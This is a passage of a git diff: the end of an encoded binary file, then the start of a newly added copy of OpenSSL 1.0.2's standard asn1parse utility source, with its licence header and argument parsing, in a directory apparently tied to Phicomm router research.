zA1VAvF1%Fm@h<#y!B@C&v(}jJT<XGS2>*{Ryh`wgT)6T3d?)=nepBLegx}u|1jG<a
z1@CgnSt0l$7r#;PgbR-e&JROcBjfub!SR4t#<ouIH(mG@g1_&=uM+%g7yc8$3uOFe
zGr3XlBV72e1s~+XZxj57F8q&zpW(vq61>WVn|7Y>oae$H7Ji)ze_Zg3T=;gu6E1v*
z;McqGe+Yi73x8AayIuHuf<NxUy99sEg?}peTP}RB;9V~KfZ%&wcs{q!d?!y2JW*-=
z1wX`vn>dy4407Q|34eqOKVI-NT)0{1&Ufe`QN5ii{Igv6SizUM@JWJS=)%hczrcmh
z6#QxzK38zN9%gki^Pha@W*2{n@PFsRmkYk#g*OVGbm5dwUTU^rbH#cf_;${eMlnA3
zz<=U_-|T@?yv`>72@m`Y4}6yg-tB=8L|n_3?+G6GIN(3PylH`q1MT&-3J?BS9{2?w
zc&i8gV-Ngi9ys*}*~)dl2mXWy{(=Yox(EKg2mX}@{+$PY5aM_?{SWuRhkD>6J@C^#
z@R=U?xgPih9{435_>VpCYdr9qJn-Lo;CFc74|(8^dEoh&Kxec6Qy%=6J@B_Z@T3R+
zxd;B82i^<)M>ai=_Q2_yPBwmt2R_aNpX`B$Jn*wT@C{fZ$)-<@2meA3yv+l@+5`WM
z2Ts?Uvgz}v2fo7tr|VDI<m~pq_XDT6da^9^@HKUGG&$&>2rrifKfZnr++JVMeG%;+
z4t}<LPY^j5i5$DGK;wgK{7J(9#AkA_D_PS7-!J%$qQC+VIn>{0lYglP{u7aZU7-<N
zEApvd&nD+y51jh@Z2W(E;GcWoeXz7g_Ww%sDHeT>1fEU)DZ)QePId}^tl+N;&e!#E
zZkmUjvpn$S9{3s$d_8c||3+E(=6eE=@6SE>zxTi&@W3DSz@PWP-}At~@xc3f#D`-&
z@Kb?Pd2f~lP`+;g<sI+AFZ00ZnqId0UF3nE?}5{`zHD-?@xcEdaMJ(Y!;ItbeG=Hc
z(}RD%2foz<f6D{^(gW{<rRr?@7kS{N9(aWZz6dy#_aeCv!uMF9yh}a!aSy!11HZ)s
zzXLesd-+ku&U_CBcIo<Jw(@TCz~Az~_jusl9{8b%``Pjx44m}5PHsxH*P}`Ve^2mv
zrWnoy!N>5Umg)OBrU_o@!siMe75oB`6A}D*!TCN8oNEG}P0t^D;J@|2@AtqT_rPED
zz(4T7zW`2ld;2(3pqr&!2R!(PpkE~Z#e)oy?;FAHalo^ccen?Bx(7br1CM&()K6#2
zcO!7p^FqJTlkZc(?lm6#8$9rPJ@6+){s$u8Uf+Dhga4Ta{+-BKa=g*gUU%(}aRceU
zN^ri<1(YJ-*~&ZE126T!D?ISUz$xE?9~yo59vSS`dGMP(@XJL`hYSR)eL6h&*L&c%
zdf<N&`F#c(J^B6`?Eck*zug0W-2>kx^4Fed<p0@xIr}{L{W0z#yPa~9A=>LRM*z=O
zU&X?oG1TzQbp<@EE%*ng7+i|yO!SZw5`Mp7hHvkmnJ@S<!TBB<P$C|3F7UwP9{4&B
zyxjx;i3ffoaI#xugwfw#=egB`f42wzcMtqE5Bx*ml&>#f^5y$?u=|AvzuN<+@oTpF
zJ;eh*!vmk@fuHMvw|d~$dEkHcz@PTOKlH$J5uk9Y$99|tewqiq2sqjQc)EcE+b8DB
zsrBGDdf=-)@GC_AfC)x0-v@==pL_8CEc_<n|5fyP*n|I;2j1<0ANPaocAEm6>~P{~
zCPTh=3cK?Ke^~I3MW1CJa#niaKlZ?XA@ct?(FnG6dXESHdEsvo{sz(K9S{D$J@DNk
z=Zr~4z;cnZ*MtA9@P99S371Ykk9DVI9_{o8;FF!7bICczL(Xv?a_mbg_?heoJ$Z;H
zGx0R7IW~_aM#7=syijE7?8+)9UKgpU=ZApnBCGIZDIVdh!_$-1we(HTXFK$ed89EK
z<L9Fz^n9X{Z6uMnY&kHFmmoxzNAWl=Ud%9p9(x^8;xw<SU0T;PA~1UF$g!kxiePf1
zw+gh<bGWS|>RMZ>k)Ra<_*qQo6ibO|Y{FYI<hfi{)4Z8s1fIHYjp1qRW~5}CpB-+g
zuWfcnXoTL75UE+pZ%&BBmexa&aiwGMq@+C<Z`1J`03!4viD)fYrDFp<OV4(UHQ=FV
zlr1nOFm{wPB0RN({srhCAC9EG(e!T&{ToaF#?il0`Zu2b1xyl7gV#zB!bt<1EWqgk
zoG`%rk%rGw0xV`Erya>@N1ALoEsP9lBU!>o=8rUdmNSawj54}%+EJW#6sH}<sYbDc
zQJi)Zryb4w(WYF?A8q8Y%+Z{7G^ZWSX-At>EMYWr#xQ>j%NfIR@N6;k9K&hHaN04P
zb_}N)!xF}D+OeD#wE_NEPHU__meY>qv|~B#SWY{Z(~jk|<Cs5=^BTweaV%#X%N)mP
z$8p+moOT?i9mi=)nOVxrQkGN7a!Oead<goKa@tZ(TgqumIW3$DXUDSyJOWPpoOV2?
z9nWdUbK3Eoc08vY&uIfCoH$UzsRJdPJW#^v10^gVP{I-dB`hLP!ZHFSEF@53q*xa-
zQpCx`%f!vZ!^GVJMv8H-fbqM4IG*vg0NgDyJv@6#FdUgZZQ8u@`H}g-DdF-6URl#p
zgU5~+R7B+E8MNCF#S`qc+}=6vv=B()f!_`iSyo@Yyw%0yuw;295qgnIq_#R%ZBv@p
zGnj|WGjpIghKI`mQv7I%w$jtvnG_0fpx77Ua8svu#t^MBx=Qq=BMvGp@ft)jyfmko
z1@TkxI9FX;D+Msh;5{shs^-s*n3qscYGTL>6@&s%UKrubt}35}_r)L*N2?q0$hM?j
z))I|6h?De4w}Y4Tm`JzGDW5yn?3!o2*<Q?@vS3=Ivb>TMcgoMKid4-kU&IIY#PSwA
zjnBETJdX3VBkLk_=LI9P@P-)6V`(V~FkXNtX_<UJf>$TNQh0^I1(9X+Hi!BZ^fCp!
z!(s*1eIr#qX-#IN_oO)0v8K8-Qp>x`B1_}TmZ1iO$=}U!h)5+hQs5)4CIzg*?-4*A
zH7k%1g~o1eyx9Q<FD!DZV1kA8YKMwh(`IvL7J(I0iJjI9Sf|D~ULHaF@do<hw`<T2
z=blc_WhJ<&Il}vV3a_k5ADuZ0y&ImjkJQ)UB@m<+UKd5hCn`?Db(R@6*J2zcVIfts
z!xd8(MP|(|D>oJDP-U368nMc<D~{7pUE>I19_^O{qhYLN<g$hsy-a9%OLYTx{iKSv
zQGE@)7H36Ma~yACXhB00M}r^G%Tl-}u4}A|nRg;kFC2;Cl>$atYNYbk0wbJ@Fe_MD
zj#pinw<R#bjhSDBBsxT6$PS|k)AYG1A;VZy0TLCcl}dv|>ri02AuBK)7ZfN#1>=HP
zOVgUnY%OT$Tv~4TwGOpT{YIu)Q)kbb#$gF!@KzIUa@1~G<n;=QATM#6J!J+)EL5)a
z7>0&0JlJq%Pn}mKJ`%@^GpujJF&dGck2#hwZ*KXV$kh1@x#ea6G;T4XECq@O>>DW9
z`aHC0BzNaSa?>=FA&kAojE+#ztU{}4r>KUNXqD`YEQQ1&Jj|OKtSUDx3qFFk7zH92
zFg8TUX?s#wJ~c(EJUVYu1{W+$jmey5^RfyOkW!Z<^-M-Dwwhi(t9&lH8TL82S&6h+
z)@0uNxfQdfN9v=E%kjDz4RK$=;^)nuJ-3`qOHNu7Z^0Xv@J+?%^Mvy2G)C4rWfk-0
zN2+F5%$jdnE?bI5zuZJy>Q<trXGYhUW~xhBl{)7vrPiD}WGX{v&g6YFWHs;nV5tkH
zP{1Yw&><pjReUMlWs@}<eb%A)-P7JxEYE0>At+Vrt*NS@m#r96zyiF_a|hWcqom%c
zrC(0MW+P`5)8Wln{L&J}%NNc^zg97O7N2e6mzHH3dg+=7+D!&#4)E$7#B$2X9H&Kb
zF<Cq{S|ad!dE6n%fJS|U9}_{1EaL^#N3xjk?AbFHR2k1_z?>)P^-WC|pj**2ZlxNa
z?k<A2hiTcWY4HRi)xopjm&WVxrkch`LsM<M9&gFwSR)6>5>u~+>I?89Bs2Hmm&b61
zWMX**4f`xYc(mGffAx6HoSvFc@6%en5^vPv*N&Oy-N;s1=1iFti8V#IjljRlr<c!l
z>PA*)0{X1+t(K-3MQssiURLHrC?Mj!H0VC6`DJ!3)s6IKJ9^g{<wIu1S95DLUfUF*
zlXRFikT5fHqcqiM02(wcTC^qYr_7S#@@&+Zzi@t}Y>Gr+jK%QkGE@GH(`JS%1u<tx
z72%5vR?hV2c!?R_VaBzVA%{YmWBLG6*6eZBnOzovH#5?}Z5dvP*opxrjSte5$uW%5
zQoj*f9UIw*cM@?m^BMN-##jsD%bEyY1g1{0Z0fzOQ(FmWV1`z;U~bjydF9;dkleig
zh-IrYB|W+HRwT^w@mf13pIJV)V%nleRd8;w($rW_m`czSh4v-(^;<p9QlK&8{OsrK
zYss>oHLoMfevV&Bmh}`mNqYIA$2s#dGLMsW7%R2b@HiZ9hnMh4S84Z*Pf?GaE?6@<
z3VuZvzg>*R4|X(8{W`@EI^pn(#qg3#8T_#V8GV$sVkAaWfu83P|1w{8#uRy98Kof~
z5FyCNNa%5zXH-@fr;&m^Mv<{5=*4f4GO?70gYq&q&c?h5Ep1nGtZZojv0p1*u1LXy
z27@##s>LhrxW%YakpWH2B??x6mhvDi*1&ID#Q@!*8b(*Orj??j8Lzfd@Wo6d=Co9=
zGJ_5CvQ(OLp!E{Ubp(^wHpOFRLGKJ%*Te0U&Mo+SOD_(>HeKPrRk*!>h4{Zyc!T2K
zqHudXkNCGLJb``M2)_*<o3CA0CH(&>oc3vR^ItMB<65706t3m(Qn;4?jlwnmV7V`p
z^1THgtLI?~|GmP8Dg1vFK2_mb&P;{huK0HePLEMg-UIQW%{*sjus`D1>a#=fPf)md
zKFsj{r0`EwzIQ0xJYQw_bS=%wx6dV!K6J^^;-d(_MmpY!kHyba_+J#>pzymCex<^-
zKEG1<-HLCYC!&1sQTXe^r>}bzzEk1F3ja{azfa-jc^7)7GE>f8C1<eWAMlWq&-cam
zl+#ym(*J%X$2`|!?5WE;Nbw&~{F4-}?O>kUFmmV`iLIBFivOU(&2til|B%A}s`#4}
z{*2&MY`XMn<-el%+Mee503-iziti%>V56^x@v(A_RQTT&{zHXp{s@KBudY}*Qx*QG
z!tW5A^rv0i#=_g93a3lNR?aph=P`x9s`x_`{*K~5uJ8{OpLYA>L)*6sr)wuR-`@Fr
znswCnJVJ2N|767<r1)CTQx(2h@y}3l=u)=Lcc$WRQTSZN*ZQBM_)jQ)t-`k|obH#W
z&D!7Ef$o>5jbv}b$Le#D2ft0>!xX<=$@z`KZ&3X03cp$LpH%p5im%Iiufm5b{@;}x
zU0=^AK3zh$<$A?~|BmA8d_PnCr<9y-4}P!SAYmgJPvc|r?I*akKW-Q0?P!Ics`!JI
z99^z)3V%lNrz`wfg)ddOZjT*;lRhPi|1-tc{`?2U4=DcK9(=klo;I?>4t%T~zEE;T
zD%?JIMtoh~vOWN?k)EUQv2rQ|ck`DhzV^4}im&}`rQ&OUzD(gd&iq)(d0gpplj4t7
z`0o{8m+N80|AXQ`rufe({27Hmuke2=`~`)7;(_-O$0NJFsQ5=HoW^+8&ZjE;9|}Ly
z1HVY&TK>;G@H+*knEJAk|A6AZqVN|K|5b&*?!n(BIQh>Q#s6B#c}?MY2jKu4*+=Jl
zgy1A+EI!sg$0>ZA!iOk1y536^uE!x4C|tMGTNM7flK&@#Ydil<;kq6_QTQ85&X~S9
zz()3e6CYcyNrJoW5EY#4P^$QJ|1xdv_PA2<>6R8N|8m8DOW_HH>vG+sa9yrD6#h>o
z=OMvKPr7x*<~vXZ9;D~n3jd+t#HU+JEPuG->v}w0@#)qN%cuL4X(RdX;A8P~J@95F
z=MReibA{8b8CK3c9&)xS{^^SUyy9#9Usrss|Hq2IQ_0z{@OKq{hzumCyxMPnCpg*j
z48{K+#s7`MA65Lx3g70ze^c>;ivKSU{$9nOqWIk&{KW@@gpJDeK0em|n+2zG{ZQf0
zD!!hV?epNz^&v4flK&w-RzBTNN}F3g-A73q@&AL5<rgVDsqhm7Cpl9UezM~0b~nZY
zpQP}6l$>&f?^5_2g=>8l3r_l!DSnOOYke9$@YPC=jwhFT@HZ%2>;DTSr(EgtYsLRq
z;eSzls)K>}&~~5Ve}ZFMFMspkZ&UnF6@P~Z{|&|eO!43K;O|!a&lUe$4}PBkAYr32
zeTk3N-zPZL7oC$sC#?9o{l2I8)0CWjioaLkbiX8RBzqq|Hs65?->>i!1t)!`E4)PU
zb$mNR;kqBGRJiU(mMHvdCI4c<Dc_L7*D1cvcb~$)Rs5rVfCFqKrve{a-V+2TJ81t8
zDEvFcKU3ic6kf0JZiTNCobsKa@GBJ`xBsQ|`IX|&RQy{NpMFo=>c2_hxe9+l;du)G
zOyTz^`Ocv@z(#h^c%cVQ_b1Xu{HO7;`V3WgFO~09!O0F`#jjNOy$YYN@JfX*R`@K1
zFB6>f(f-h&`1dM)i{k5X;ExslsN(-q;k0&Y%e!0Qy;XU?QutQIKWHEhu#p|M<74F<
zB{=EdN68tcaP4nXJ@5re{%9pXqWJeIe7VB49WGILfzs!vf|LFSDf~vor(ZC&<+@k#
zbv<rV{Ku3&FDbmAlJka=Gh6ZBSN!`Fen8<`PT^r7VI%$Zc<)HT$^QLSzH=0R6wcXl
zEmnM;Z@uDIDSoR5|6+yTulQFg{CS1{R^i$|-xHk5b+6*@Qhe>V`xLJI);S!Bv5_6L
z-xdk(_S=&bU;F3j9{5a!(=%z-p64jMP~jIUe1O8+1b3Hrqr&H)3|9ViN{+6tUn;(~
z+iw*<SIN2EL(bibujM?T`1dP0k0@N%@2d*e^?S$>NQ{l@<wbmKxdtozC54wMT=VBD
zT=UOW_#w*9tqT8v!q+LBes|aEbCuv!FY}Z>KUe(66n?wH>DrT(^O(Z59o|*=K*j$`
z;dHIa%IQ;t%&?t|&*2I$5}fS$3O<&9g2G==c!|RQq41!>b-rgST+2US;abjff|K3m
zEBUW0zV_RHDO|VTq{4Ok{YK&14-YvKnPGFc>k|Yg`{@2?w8C|JpXq@wRq{tembLS8
z#n<I(Qn=Q$P2u!zMl0tAC11z$TNM9D#edd=zfbXxQvAZB$T~gyiz5Ul`_Q`{tUi9l
zUx0HKKUwj0c}FT-$AM`|&NwBfQt`E%1q#=8YgD*yM>~}K`AYt4im&Crr*Q3W|53R1
zx33kh^%-z9GQ;Nfx8ntO``ajmYk!;JfmbW}qmhrb|1!nb<!V&8*7HXSKUUT64GKR_
z;eQaE%BB7AUd11z_*)eIpwjbIh3o5p?<m}_<a{o;JKt{=|9Hh8dJHndMs_|y;bR0R
zIofZ}P<(B-84A~ayGY5=ep{pXTF%7^*Z%ps2R`gr(%$H=`9Z-+|Ksqn&#f+U;np9T
z6@Di87Qa-<e?#HdD*jmtztMyLC&gc=`1gA7`;*exs9uJudO1Sjx*tD9;kq9mt8jYf
ztu5Ddg`cAEsKV)94$F@#oZi`N@yiuHLgCjaT+6>r;ioG81A<e(tmQnW_`2WRqwu$o
z#_DtMARJ($dLNIE#Sasl?5X)f6i)Bvu>6r8aw-)+V?9mbT7J|+&iNkv>l8jp>GL~<
zk5>4f6+TAcFDZPi!v85a*=Lcm&zBzj{R$ta<n;0*F*dTN&i6z=p$6Caj`lOm^>Q|L
zt(_+dPI7b{n5}RvXTHMsA&r$&t?*K%=S6~3c_|P2&~~k#zgQoO5%PP5Pf&915}dfF
zDg0rD(>u$pK2Iq*i;>3SFDSk)@9PTJ{m!QfKV8Xpj)zceR4%>leWc)|=biZ2d{0&Q
zzZE`S$vH>iLB&5KCoN~D;-9Pd^E~)F75`qv|4`xQDg0w4N82a&1dy;%xwQUA2~Kv1
z;A6`>Nb#rSr14^f>v794h3j$4X@ciMw$^{L;_Lc~DExrZr%~a0o_mqP=^i<&e?stF
zSH9OOe2J3(b0tUH?avA?Q}XXqa&(-0Sn+in+o5p1zW1iW%a!~u6#l5vb2T|Dwp@I)
zJug$Z_J=D3r+U}r`mN&YdcRxob-i!*;6LlZe@)@jRk_|(cu3)2D*3uxdBs#(Q{HNP
z+xjgK++D6h#b2uU0~KHU&+!V^dX7<Yv_54D*ZNc_Ioi%uim&xqp!iy!B?{O2T%>UA
z54S6PhO*~oh0j#@TMF0hWskzcia&8MS>MEsSqiUIxQ+u06t3eyt>A9Ity6p*2ig>_
z<G{}puI+Y{!nGa#B)B`@dlX)S@>#!nNXgOlxK-iw8yc4XuEJ+4e3z21{b!HDYgNAA
zC^<Ucz9*9Pjs2^X{38W-m&>p4DAHLyPf~KU{K*Q}^Nvb|>$ntExc0+a6+Tz#dB5PK
z=Q5?w7asillR&~o{N?yq{fiW??Kw#BUf}9-MHH_6bGgE|D*3BD<X@`z+CLxg;Qw9W
zIu379a<rcRQT!E3pKit1arlrSAYmi>)Zt_8bFAQG2hBfK@pYU(&4XX1aNX|CRk&_<
zwMxFOmu7{Zuk?&7Iob{hh0j<1^9zM*|NOPWb^ZQc;ktewQMfMG(+bz+dQot9`+8g9
zx?KNKa&)=&DgFh@4&4f`S9sr{IKW2vHsE9H_YlF|etx9FwS58#*X{H%C12Oqc7<!d
zeNM^I<=U<IE0mt!DZci@{xmVg=JwkY1$X;xsp4zDo#Me??7?5*!M|Mb>!6pl^A#Ta
z>lCj0<zFgXk7xd@<ZC-Wtng};?_)}iw)1wyU#j@eD!%sHe=1z-`H_;N_1UX%t<Seg
zj@Bpd6exj>>QU=cAUM^d)~86}TA$+;uI)Bj$=7;LRk+qOq~vHlXDhzebH3thJ*yS2
z^^7YyTA%d_*ZL%s9Iel_im&zgnc{1GZc(__=T9E^10MME3fFPqJB6Q>llK3g4WrsM
z;|(2GZ&tXDtM>^`{-EvikmBop^CgArIQ*W%wH>-V<bS2`^O3i0zh5gk+Wx-bR4P-h
zvsHOZ1SkD<94l3P9mmd4_+lleO5x`yyjIEA_GwgjBl5QT$CVtd{|1GhtK?s&<j@q#
z%K4Sz>vfDjD*ky&&fN;v<KYLCoQUGTq4-TI-}e=Nufo4k_(CNoe*{R_C~oL-6)9Z%
z=Lm&AjWo8r(-f}#{6~UQ{c8LCQt|Ipa{l1Kf7pY+-Gl$42mb>P{>L8tLr#Tq*hv3o
zd~A6KDf~i(pQv!{Z^H$5j~{OE;NPt97A5~S4>^x0eyidiRe}R-ly9}Fcf2HuH^P@H
zJR~@kH-?Wb?|BN3D?F-jUEX>nU$>)#!fRB%H!1ucCI2=L{4XB(Up?^06ke<H-Jx)u
z@0%X@M;`b-4;(ML;*IRNQkAP(aI*hz6n=%mmnl7OR&rJ;{{JYxw)5MHzgqD>P<);5
zeuXbr`Su=(#MnsxHTYP67$CUYpHEQu3MJ=ch1V&(Ov%4U$qy^O*0V|Bn-%{OCFf#=
zU!nNgKKCg8C5pdE@pZocQv6F5KdJcVt8(p8eBCbip(CUxd#+V-`i#N>Hn%<TDmmVW
ze;Gd3{*x46>)ERK>lFWD5B}YXf4Sm6<iS6n_&-wo-lK7V&F#-e2u}L9;bZk5<iW=~
z;CLhcdd0_!>3DO?uTcCAia*DLzf|$BQ2g^f_!lewj}^bogMYo^U#a*vdGP<N_zA_o
z--EwZ@i!{|4iEl2ir=pIAA0cjDgIT8&ksA{*lqtq#sI`d_0@rot=}UBck@qH{Hqlo
zFLmV2&Btpdc_aDP;A7>_^x&VP_}40atp`7@_}3}^r5^mN75^uSe}f1Ae-!_xivJf6
z{;%jJ18ii63sgMmRCv9@b4r=c{04;|t?)*Lk5G7%!h;HLR`{6;zfj=~3U5*PPZi#(
z@V_cNrtp4r@dg`}_fdRo{hq1tm5P6!!u338qrx{SIlor;DkbMH3V&Ylw<%oDk6u;y
zY9;3#g=;x`6|T#5!USZ7jmrBhKDN9Q6#k6D=PCRmm2X7h_bC1b!KuCI`NegL|D@vI
zs_;vc{5utXslxA9@~>BN9#;6z6uw>IHz@oiCI3E!zp3!GD&O~%oS!THSBig`;(x37
zH!A+wr{Mq_*+<VuB7#%B+=-8^m#Y=7?fj*}f28vLM#-P3<n*NjY?SXW@Uij_QTQ(v
zevIIxkG4;V!rN57<CGlQweqJaT<2S<@LwtZLc!hnp09BFO=m0rLM4ZGExuOaI^Sy*
zev{(AD>&tQrINp2@#&nEUoZ&=*a%A~excxGXU!j}__{sTD7;<C`K7`&|9&NZJMysl
zY*PFVC1;z$uU7cmO3t+k|Ci!xIiD*0I>nb^CYSX$N}r`vcx?35iI3HDjR*cxZ;-Ij
zX&sjy>&r0XZ(-NUS$S|8|F^;?4oc&ize?e{9W@-E=4<_Xt92yJKT5Sb9dCc7{71K!
z2NZsVvYW{jzh{P>e)KuWAVqS*;sXUQapA`b9&+J>1z+OAPZfN%3m+}`wJv<J;J3T*
z8G?7Z@Ogs2=EBbt{8JZBzuQGy0TmRREpMaXbWf(nFBQDhh5tlwx;Co$^t)ZO(HxLA
z`XW2uC-^!SZl5#1(S>go{#`EoNx`?f@aF{I>B3(Ye4h({U2yw*OLUs_q~8UjZ3qPt
zY!<iAy-#-GdxdX*&)xF71#foo50Z9uiwhqp_=7Io@}GC%gM|N)3m+;tempiq|IvaM
zx$x5kFLB`&f`?rA0>PKK@Fjw;cH#DU{%c)$O!&9E@E-}@>B2h%f6awoFZib}{C9#E
zNZhmaLcd=|o8N^$D0rz0f86p-GVaI4<cy4V;fKhvjSs}7&sf20<=f(O<e0`Pv{}59
zj~s`_gtS?l?(L)PBlDHQ7YIICzAb-}*oFF5+AMB<zZmxyyYOXFe%tOW-~Jx_E*F25
z^dBWeRPuZGF~^s<@U_w|wz%+lVrTRF^JzVw65RTs)yMumrTIPcG{0Q>r(2}lmT!M=
za+eFYzbnZdozma_uH-PWhm~W057PXObUI)AyNu_!`1JcVwB6>yUl)9*3%^kuXjr~U
zXY;kcBY24mx4+MKmkWRYaFc$Y3;)Lv1}~9%v-0il-d*X!?eEh4!-d=5f&0>h+uwm3
zDD`jU+uwm3;==9kz)f`F_IKcFUAX-nxI0|9{e89fUAX-nwPOl0?RlZ!9EV)^2ZG03
z_>$ud|4J8rq2M>U@Ku7p=ECjoe%bMbwU7NBuQF*L7Pr5@b*&4xznk@-3%9?I)l1rq
zl`~_g(Z9-t+uy;ecj5N;uGYD5`+HZ<xN!UXQpMDXVzc?$-+$8YC!urpcZnW$@$K&k
zz3;;9?*`HD4bo=i+u!v$$A#P9^|{Z5+u!5a?!xWw?(B2n_IGp!N?ft|+TY8W=)&#q
z-#8;$*EGbcm*P9tV!l_{y_RTw^$313{Rn=y_lTvft<H#+CORN`U<7{Of=P^E4<|>^
z8;a{4{5DKO1K#@WjA(3%MMq4ZwO}~^ih&$2Z;X$?yHD|6^4J=Y5nX|o-{N<4jNShK
z{`W%wbpg`sQ{pDe-aeVH*b~In+tE0nkT+R_*dK7c0ZJ>(H<^{vO7n5-`20k{C5#&~
z{+FJf+RfN;=RXW*Nv2nNe@5zb{uT~khh*CMm&I-VPfNS7xXs^wmrHtg{(dR<3h57Q
zdcWO~@5%ViX1~xs4Z)6I$bM8uZu>0+M!J;Xqqi$7&Cw|u#J<(repf3@Q}31Z8l!!i
z&f*thhe9;9BfUK+>HQkSzSZBt3G9$ecly^P{gQ(%(|o(ruLqpXe(T;feA_RQ7z#l)
zz4gCrc~i>L#q{5C?iy^qefat{KJN4f0dv<qrTAza{m0tWq2}BEciWGK2iel!^`S{Y
LYt4Fdr~m%|%u=`o

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/asn1pars.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/asn1pars.c
new file mode 100644
index 0000000..7a0f169
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/asn1pars.c
@@ -0,0 +1,430 @@
+/* apps/asn1pars.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * A nice addition from Dr Stephen Henson <steve@openssl.org> to add the
+ * -strparse option which parses nested binary structures
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+
+/*-
+ * -inform arg  - input format - default PEM (DER or PEM)
+ * -in arg      - input file - default stdin
+ * -i           - indent the details by depth
+ * -offset      - where in the file to start
+ * -length      - how many bytes to use
+ * -oid file    - extra oid description file
+ */
+
+#undef PROG
+#define PROG    asn1parse_main
+
+int MAIN(int, char **);
+
+static int do_generate(BIO *bio, char *genstr, char *genconf, BUF_MEM *buf);
+
+int MAIN(int argc, char **argv)
+{
+    int i, badops = 0, offset = 0, ret = 1, j;
+    unsigned int length = 0;
+    long num, tmplen;
+    BIO *in = NULL, *out = NULL, *b64 = NULL, *derout = NULL;
+    int informat, indent = 0, noout = 0, dump = 0;
+    char *infile = NULL, *str = NULL, *prog, *oidfile = NULL, *derfile = NULL;
+    char *genstr = NULL, *genconf = NULL;
+    unsigned char *tmpbuf;
+    const unsigned char *ctmpbuf;
+    BUF_MEM *buf = NULL;
+    STACK_OF(OPENSSL_STRING) *osk = NULL;
+    ASN1_TYPE *at = NULL;
+
+    informat = FORMAT_PEM;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    if ((osk = sk_OPENSSL_STRING_new_null()) == NULL) {
+        BIO_printf(bio_err, "Memory allocation failure\n");
+        goto end;
+    }
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            derfile = *(++argv);
+        } else if (strcmp(*argv, "-i") == 0) {
+            indent = 1;
+        } else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (strcmp(*argv, "-oid") == 0) {
+            if (--argc < 1)
+                goto bad;
+            oidfile = *(++argv);
+        } else if (strcmp(*argv, "-offset") == 0) {
+            if (--argc < 1)
+                goto bad;
+            offset = atoi(*(++argv));
+        } else if (strcmp(*argv, "-length") == 0) {
+            if (--argc < 1)
+                goto bad;
+            length = atoi(*(++argv));
+            if (length == 0)
+                goto bad;
+        } else if (strcmp(*argv, "-dump") == 0) {
+            dump = -1;
+        } else if (strcmp(*argv, "-dlimit") == 0) {
+            if (--argc < 1)
+                goto bad;
+            dump = atoi(*(++argv));
+            if (dump <= 0)
+                goto bad;
+        } else if (strcmp(*argv, "-strparse") == 0) {
+            if (--argc < 1)
+                goto bad;
+            sk_OPENSSL_STRING_push(osk, *(++argv));
+        } else if (strcmp(*argv, "-genstr") == 0) {
+            if (--argc < 1)
+                goto bad;
+            genstr = *(++argv);
+        } else if (strcmp(*argv, "-genconf") == 0) {
+            if (--argc < 1)
+                goto bad;
